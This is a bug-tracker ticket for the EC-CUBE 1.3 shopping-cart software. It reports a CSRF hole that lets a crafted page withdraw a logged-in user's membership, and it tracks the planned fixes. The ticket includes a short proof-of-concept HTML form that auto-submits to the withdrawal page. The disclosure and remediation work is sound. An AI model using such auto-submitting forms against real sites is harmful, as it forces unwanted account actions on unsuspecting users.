Ticket #125 (closed バグ指摘: 無効)
CSRF脆弱性
| Reported by: | adati | Owned by: | adachi |
|---|---|---|---|
| Priority: | 中 | Milestone: | EC-CUBE |
| Component: | フロント | Version: | 1.3系 |
| Keywords: | Cc: | ||
| 修正済み: |
Description
ログイン済みの状態で下記のHTMLを開くと、退会が出来てしまう。
CSRF脆弱性があるページ→mypage全般、買い物かご
CSRF脆弱性についての参考リンク:
・クロスサイトリクエストフォージェリ(CSRF)の正しい対策方法
http://takagi-hiromitsu.jp/diary/20050427.html
・「ぼくはまちちゃん」 ――知られざるCSRF攻撃
http://www.atmarkit.co.jp/fsecurity/column/ueno/33.html
CSRFを実行するHTMLの例
<html>
<body>
<form name="form1" id="form1" method="post" action=" http://localhost/rel/mypage/refusal.php">
<input type="hidden" name="mode" value="complete">
<script>document.form1.submit();</script>
</form>
</body>
</html>
Change History
comment:1 Changed 14 years ago by adati
- Owner changed from somebody to adati
- Status changed from new to assigned
comment:3 Changed 14 years ago by adati
修正項目一覧と進捗状況
管理画面
[OK]リファラチェック機能
フロント
・商品レビューにURL書き込み制限機能
→[OK]conf.phpに定数追加
→SC_ErrorCheckに特定文字列を制限する関数を追加
→レビュー書き込みのところでチェックをかける
・マイページ修正
→[OK]退会手続き
→購入履歴一覧
→会員登録内容変更
→お届け先追加変更
・お問い合わせ修正
Note: See
TracTickets for help on using
tickets.
マイページ>退会手続きに対応